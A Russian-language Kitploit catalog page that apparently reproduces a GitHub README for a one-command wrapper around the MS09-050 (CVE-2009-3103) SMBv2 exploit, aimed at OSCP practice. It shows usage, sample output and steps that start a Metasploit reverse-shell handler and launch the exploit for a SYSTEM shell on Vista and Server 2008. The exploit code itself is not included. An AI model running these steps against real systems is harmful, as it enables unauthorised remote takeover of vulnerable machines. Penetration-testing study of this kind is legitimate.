Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ms09-050-CVE-2009-3103-exploit | Kitploit
Инструменты/GitHubGitHub/nicolasdamians/ms09-050-cve-2009-3103-exploit
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодТестирование на ПроникновениеОбучение и Образование
GitHubnicolasdamians/ms09-050-cve-2009-3103-exploit

ms09-050-CVE-2009-3103-exploit

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
8 месяцев назадЕщё не проверено

MS09-050 Обёртка эксплойта SMBv2

Настройка одной командой для эксплуатации MS09-050 (CVE-2009-3103). Без хлопот, без отладки — просто работает.

Зачем?

Большинство встречающихся скриптов MS09-050 требуют ручной инъекции шелл-кода, имеют проблемы с таймингами обработчиков или просто не работают. Эта обёртка:

  • Генерирует шелл-код с правильными параметрами
  • Собирает эксплойт автоматически
  • Создаёт готовый к использованию обработчик Metasploit
  • Точно говорит, что нужно запустить

Создано для подготовки к OSCP, где время имеет значение.

Цель

  • Уязвимость: MS09-050 / CVE-2009-3103
  • Затронутые системы: Windows Vista SP1/SP2, Windows Server 2008 (до R2)
  • Сервис: SMBv2 на порту 445
  • Результат: шелл с правами SYSTEM

Требования

  • Kali Linux (или любой дистрибутив с Metasploit)
  • msfvenom
  • msfconsole
  • python2
  • rpcclient (обычно предустановлен)

Использование

root@kitploit:~
./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]

Пример

root@kitploit:~
./ms09_050.sh 192.168.233.40 192.168.45.232 443

Результат:

root@kitploit:~
[*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
[*] Generating shellcode...
[+] Files created:
    - exploit.py
    - handler.rc

=== RUN ===

Terminal 1:  msfconsole -q -r handler.rc
Terminal 2:  python2 exploit.py 192.168.233.40

Выполнение

  1. Терминал 1 - Запустите обработчик:

    root@kitploit:~
    msfconsole -q -r handler.rc
    

    Дождитесь: Started reverse TCP handler on ...

  2. Терминал 2 - Запустите эксплойт:

    root@kitploit:~
    python2 exploit.py 192.168.233.40
    
  3. Проверьте Терминал 1 на наличие шелла.

Примечания

  • Использует staged-нагрузку (windows/shell/reverse_tcp) - надёжно работает со стейджером в этом эксплойте
  • Если эксплойт не сработал, целевой системе может потребоваться перезагрузка, либо она не уязвима
  • Порт 443 рекомендуется, если 4444 фильтруется

Благодарности

Оригинальный эксплойт основан на PoC MS09-050 от ohnozzy.

Лицензия

MIT — делайте что хотите, только не творите зла.

Скачать инструмент